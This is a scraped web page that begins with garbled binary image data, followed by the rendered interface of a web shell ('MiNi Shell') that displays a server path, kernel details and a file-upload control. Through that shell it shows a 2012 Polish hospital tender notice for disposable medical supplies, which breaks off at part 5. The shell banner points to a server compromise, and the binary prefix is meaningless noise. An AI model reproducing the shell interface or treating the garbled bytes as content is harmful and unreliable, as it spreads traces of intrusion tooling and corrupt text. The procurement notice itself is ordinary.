JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120206/35186-N-2012.html

<p class="kh_header"><b>Pruszków: Dostawę sprzętu jednorazowego użytku dla potrzeb SPZZOZ w Pruszkowie</b><br>
<b>Numer ogłoszenia: 35186 - 2012; data zamieszczenia: 06.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej , ul. Armii Krajowej 2/4, 05-800 Pruszków, woj. mazowieckie, tel. 022 7588002, faks 022 7287138.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalnawrzesinie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawę sprzętu jednorazowego użytku dla potrzeb SPZZOZ w Pruszkowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sprzedaż i dostawa sprzętu jednorazowego użytku dla potrzeb SPZZOZ w Pruszkowie - z podziałem na  10 zadań - części w  rodzajach i ilościach składających się odpowiednio na pakiety nr 1 - 10 ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1.Zamawiający zastrzega sobie możliwość udzielenia zamówień uzupełniających w trybie zamówienia z wolnej ręki dotychczasowemu Wykonawcy dostaw, w okresie 3 lat od udzielenia zamówienia podstawowego (niniejszego zamówienia), stanowiących nie więcej niż 20 % wartości zamówienia podstawowego i polegających na rozszerzeniu dostawy, jeżeli zmiana Wykonawcy powodowałaby konieczność nabywania rzeczy o innych parametrach technicznych, co powodowałoby niekompatybilność techniczną lub nieproporcjonalnie duże trudności techniczne w użytkowaniu i dozorze - art. 67 ust. 1 pkt 7 ustawy z dnia 29 stycznia 2004 r. -Prawo zamówień publicznych tekst jednolity Dz. U. z 2010 r., Nr 113, poz. 759 ze zm.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, którzy spełniają następujące warunki:
1)	posiadają uprawnienia  do wykonywania określonej, w  specyfikacji istotnych warunków zamówienia, działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują lub będą dysponowali potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4)	nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust.1 i 2 ustawy z dnia 29 stycznia  2004r. Prawo zamówień publicznych.
Zamawiający dokona oceny spełnienia powyższych warunków na podstawie całości oferty złożonej przez Wykonawcę, w szczególności dokumentów potwierdzających istnienie po stronie wykonawcy w w atrybutów.  
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie złożonych oświadczeń i dokumentów.
Nie spełnienie chociażby jednego warunku określonego w pkt. od 1 do 4 skutkować będzie wykluczeniem wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o posiadaniu dokumentów dopuszczających  do obrotu  - załączniki Wykonawcy.
	na żądanie Wykonawca zobowiązany jest do przekazania tych dokumentów Zamawiającemu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>c)	Aktualny odpis z właściwego  rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
d)	Aktualne zaświadczenia naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca  nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu , wystawione nie wcześniej niż  3 miesiące  przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>.     Zamawiający dopuszcza możliwość zmiany postanowień umowy , w stosunku do treści oferty Wykonawcy , pod warunkiem, że zmiany te będą konieczne do prawidłowej realizacji przedmiotu zamówienia .
    a). Odbiorca - Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w zakresie:
       -   w sytuacji opisanej w  1§  ust 2 . Projektu umowy strony mogą zmienić umowę zmniejszając ilość zamówionego przedmiotu zamówienia albo przedłużając powyżej 12 miesięcy od daty zawarcia niniejszej umowy okres dostawy sprzętu jednorazowego użytku.
         b) przedmiotowe zmiany nie mogą skutkować zwiększeniem ceny jednostkowej wartości umowy i nie mogą być niekorzystne dla Odbiorcy -Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalnawrzesinie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej w Pruszkowie 
05-800 Pruszków  ul. Armii Krajowej 2/4 - pok. Administracji.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.02.2012 godzina 10:00, miejsce: Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej w Pruszkowie 
05-800 Pruszków  ul. Armii Krajowej 2/4 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawę sprzętu medycznego jednorazowego użytku dla potrzeb SPZ ZOZ w Pruszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	 Strzykawka j.u. dwuczęściowa 2ml, , opakowanie 100szt	564 op.
2	 Strzykawka j.u. dwuczęściowa 5ml, , opakowanie 100szt	786 op.
3	 Strzykawka j.u. dwuczęściowa 10ml, , opakowanie 100 sztuk	753 op.
4	 Strzykawka j. u. dwuczęściowa 20ml, , opakowanie 100szt	939 op.
5	 Strzykawka bursztynowa/czarna 50ml (60ml) do pomp infuzyjnych 	240 szt.
6	 Strzykawka biała 50ml (60ml) do pomp infuzyjnych 	6360 szt.
7	 Strzykawka j.u. 1ml U40 do insuliny , opakowanie 200 szt.	30 op.
8	 Strzykawka 100ml Janetta	1 700 szt.
9	 Igła 0,5x25 mm opakowanie 100 szt.	144 op.
10	 Igła 0,6x30 mm opakowanie 100 szt.	 20 op.
11	 Igła 0,7x30 mm opakowanie 100 szt.	98 op.
12	 Igła 0,8x40 mm opakowanie 100 szt.	446 op.
13	 Igła 0,9x40 mm opakowanie 100 szt.	546 op.
14	 Igła 1,1x40 mm opakowanie 100 szt.	420 op.
15	 Igła 1,2x40 mm opakowanie 100 szt.	837 op.
16	 Kaniula typu Neoflon 0,7 	2400 szt.
17	 Kaniule do wkłuć obwodowych 0,9 x 25 mm	4100 szt.
18	 Kaniule do wkłuć obwodowych 1,1 x 33 mm	17300 szt.
19	 Kaniule do wkłuć obwodowych 1,3 x 33 mm	16200 szt.
20	 Kaniule do wkłuć obwodowych 1,5 x 45 mm	1100 szt
21	 Kaniule do wkłuć obwodowych 1,7 x 50 mm	1000 szt
22	 Koreczki do kaniuli	15320 szt
23	 Pojemniki na odpady medyczne, pojemność 
0,7 l	3100 szt
24	 Pojemniki na odpady medyczne, pojemność 
1,0 l	2060 szt
25	Pojemniki chirurgiczny  20 000 ml zamykane	30szt
26	Pojemniki chirurgiczny  30 000 ml zamykane	30 szt
27	 Przyrząd do przetaczania płynów 	30 000szt.
28	 Przyrząd do szybkiego przetaczania krwi 	110 szt.
29	 Przyrząd do przetaczania krwi 	1760 szt.
30	 Aparat do przygotowywania i pobierania leków z butelek	3280 szt
31	 Przyrząd do przetaczania płynów po opróżnieniu jeziorka zatrzymujący płyn w drenie	6200 szt
32	 Igły do PP  24 G z prowadnicą 	200 szt.
33	 Igły do PP  25 G z prowadnicą 	200 szt.
34	 Igły do PP  26 G z prowadnicą 	50 szt
35	 Igła do PP 27G z prowadnicą
	50 szt
36	 Przedłużacz do pomp infuzyjnych białe 150 cm.                                                            	8420 szt
37	 Przedłużacz do pomp infuzyjnych czarne/bursztynowe 150 cm                              	500 szt.
38	 Kraniki trójdrożne ( wyczuwalny indykator pozycji otwarty / zamknięty )	 950 szt.
39	 Zestaw do ZO  z cewnikiem i strzykawką niskooporową( w zależności od potrzeb szpitala)	30 szt.
40	 Cewnik do podawania tlenu przez nos 	3750 szt.
41	 Przedłużacz do tlenu 2 m	2620 szt.
42	 Kateter do odsysania z pola operacyjnego CH 25 z końcówką Poole zagiętą ,długość drenu 2100 mm	1330 szt.
43	 Kateter do odsysania z ran dł. 70cm. Pakowane prosto nie zwijane  CH 14 	200 szt.
44	Kateter pediatryczny do żyły pępowinowej 4F, 6F, 8F (rozmiar w zależności od potrzeb szpitala)	72 szt.
45	Kateter do karmienia niemowląt, rozmiar 4F, 6F, 8F (w zależności od potrzeb szpitala)	180 szt.
46	 Łącznik do drenów i ssaków o przekroju 10/8	 330 szt.
47	 Łącznik do drenów redukcyjny  8-11/7 redukcyjny	680 szt
48	 Łącznik do drenów prosty  8-12/6                           	   620 szt.
49	 Dren PCV  średnica wewnętrzna 9 mm	60 mb
50	Zestaw do drenażu klatki piersiowej, 2butlowy,z regulacją	60 szt.
51	 Rury karbowane jednorazowe do aparatu do znieczuleń  o średnicy 22mm	600 mb
52	 Przedłużacz do tlenu z dwiema nasadkami CH 14 dł.  2 mb	2400 szt.
53	Krótki kolec przelewowy do przelewania z fiolek w bezpieczny sposób typu Transofix	2000szt
54	Strzykawki do gazometrii  poj. 2,3ml. końcówka luer
	2400 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawę sprzętu medycznego jednorazowego użytku dla potrzeb SPZ ZOZ w Pruszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rurki ustno - gardłowe jednorazowa, nr 3,4 (sterylne)	2100 szt.
Rurki ustno - gardłowe jednorazowa noworodkowe sterylna nr  0  dł 50mm 	24 szt.
 Rurki intubacyjne z mankietem niskociśnieniowym nr 6	50 szt.
Rurki intubacyjne z mankietem niskociśnieniowym nr 6,5	350 szt
  Rurki intubacyjne z mankietem niskociśnieniowym nr 7	950 szt.
Rurki intubacyjne z mankietem niskociśnieniowym nr 7,5	700 szt.
  Rurki intubacyjne z mankietem niskociśnieniowym nr 8	750 szt.
  Rurki intubacyjne z mankietem niskociśnieniowym nr 8,5	100 szt.
  Rurki intubacyjne z mankietem niskociśnieniowym nr 9	150 szt.
 Rurki intubacyjne z mankietem niskociśnieniowym nr 10	50szt
  Rurki intubacyjne zbrojone niskociśnieniowe nr 6, 7, 8 (rozmiar w zależności od potrzeb szpitala)	 100 szt.
 Oddechowe filtry bakteryjno-wirusowe, mechaniczne 	4500 szt.
 Rurki tracheostomijne roz. 6 ; 7; 8;  9; 10 (rozmiar  w zależności od potrzeb szpitala)	60 szt.
 Sonda Sengstakena roz. 18	10 szt.
Siatki przepuklinowe 15x15	10 op.
Siatka przepuklinowa 3x 5 8x13REFSPmm-35	40 op.
Siatka przepuklinowa 35x22 SPmm-149	4 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawę sprzętu medycznego jednorazowego użytku dla potrzeb SPZ ZOZ w Pruszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	 Cewnik Foleya 10 	10szt.					
2	 Cewnik Foleya 14 	260 szt.					
3	 Cewnik Foleya 16 	1 030 szt.					
4	 Cewnik Foleya 18 	1 560 szt.					
5	 Cewnik Foleya 20 	1 350 szt.					
6	 Cewnik Foleya 22 	280 szt.					
7	 Cewnik Foleya 24 	420 szt.					
8	 Cewnik Foleya 26 	320 szt.					
9	 Cewnik Pezzer 18	20 szt.					
10	Cewnik Pezzer  20	5 szt.					
11	 Cewnik Pezzer 22 	25 szt.					
12	 Cewnik Pezzer 24 	40 szt.					
13	 Cewnik Pezzer 26 	150 szt.					
14	 Cewnik Pezzer 28 	410 szt.					
15	 Cewnik Pezzer 30 	110 szt.					
16	 Cewnik Pezzer 32 	30 szt.					
17	 Cewnik Nelaton 16	200 szt.					
18	 Cewnik Nelaton 18	200 szt.					
19	 Cewnik do odsysania górnych dróg oddechowych 6	240 szt					
20	 Cewnik do odsysania górnych dróg oddechowych 8	240szt					
21	 Cewnik do odsysania górnych dróg oddechowych 10	2 700 szt.					
22	 Cewnik do odsysania górnych dróg oddechowych 12	840 szt.					
23	 Cewnik do odsysania górnych dróg oddechowych 14	760 szt.					
24	 Cewnik do odsysania górnych dróg oddechowych 16	760 szt.					
25	 Cewnik do odsysania górnych dróg oddechowych 18	860 szt.					
26	 Sonda żołądkowa CH 14	270 szt.					
27	Sonda żołądkowa  CH 16	340 szt.					
28	Sonda żołądkowa  CH 18	340 szt.					
29	 Sonda żołądkowa  CH 20	270 szt.					
30	 Sonda żołądkowa  CH 22	160 szt.					
31	 Drainobag 40   z uniwersalnym łącznikiem do   drenów Ch.6-18 (mieszek ssący)	500 szt.					
32	 Szpatułki drewniane	4800 szt					
33	 Ostrza chirurgiczne wymienne 10	400 szt.					
34	 Ostrza chirurgiczne wymienne 11	400 szt.					
35	 Ostrza chirurgiczne wymienne 15	400 szt.					
36	 Ostrza chirurgiczne wymienne 20	800 szt.					
37	 Ostrza chirurgiczne wymienne 23	4 600 szt.					
38	 Ostrza chirurgiczne wymienne  24	 3900 szt.					
39	 Ochraniacze na buty  foliowe	100 par					
40	 Worki do dobowej zbiórki moczu 2 l -sterylne	8 550 szt.					
41	 Termometr elektroniczny	50 szt.					
42	 Staza automatyczna	 290 szt.					
43	 Wieszak do worków na mocz	720 szt.					
44	 Woreczki na mocz dla dzieci męskie	360 szt.					
45	 Woreczki na mocz  dla dzieci damskie	360 szt.					
46	 Zaciskacz do pępowiny mikrobiologicznie czysty	2 400 szt.					
47	 Opaska identyfikacyjna dla noworodków 	3600 szt.					
48	 Okularki do fototerapii dla noworodków	480 szt.					
49	 Noski do CPAP rozmiary: XS, S, M, L (w zależności od potrzeb szpitala)	96 szt.					
50	 Maski do tlenu dla dorosłych	 1 570 szt.					
51	 Maski do ambu dla noworodków i niemowląt, rozmiar 1 i 2 (w zależności od potrzeb szpitala)	48 szt.					
52	 Przedłużacz do tlenu, długość 6 m	200 szt.					
53	 Fartuch ochronny foliowy	13 320 szt.					
54	 Kieliszki plastikowe do leków	43 840 szt.					
55	Maski do tlenu z workiem dla dorosłych	600szt					
56	Maski do ambu dla dorosłych	100 szt					
57	 Fartuch fizelinowy z mankietem	7 830 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawę sprzętu medycznego jednorazowego użytku dla potrzeb SPZ ZOZ w Pruszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Elektrody do EKG	23500 szt.
Papier do EKG Aspel  112x25	510 rolek
Papier do EKG  Ascard   104x40  	 200 rolek
Papier do KTG BTL FC-1400	50 szt.
Papier do KTG typ SRF 618 B/210 termoczuły  o szer.112mm  112 x 100x  150	250 bl
Żel do EKG 0,5 l	170 szt.
Żel do USG    5 l  Agvasonic 100	36 szt.
Żel do USG  0,5 l	486 szt.
Papier  do defibrylatora  roz. 107,75* 23	120 rolek
Papier Mitsubishi K61B	120 szt.
Papier do USG SEIKO PRECISION UP- 15052H 110mmx21m	120 rolek
Papier do EKG Ascard  RB1 v.001  58x25	100 rolek
Papier do KTG Sonicard Oxford Team 143x150x300	150 bl.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawę sprzętu medycznego jednorazowego użytku dla potrzeb SPZ ZOZ w Pruszkowie..</p>
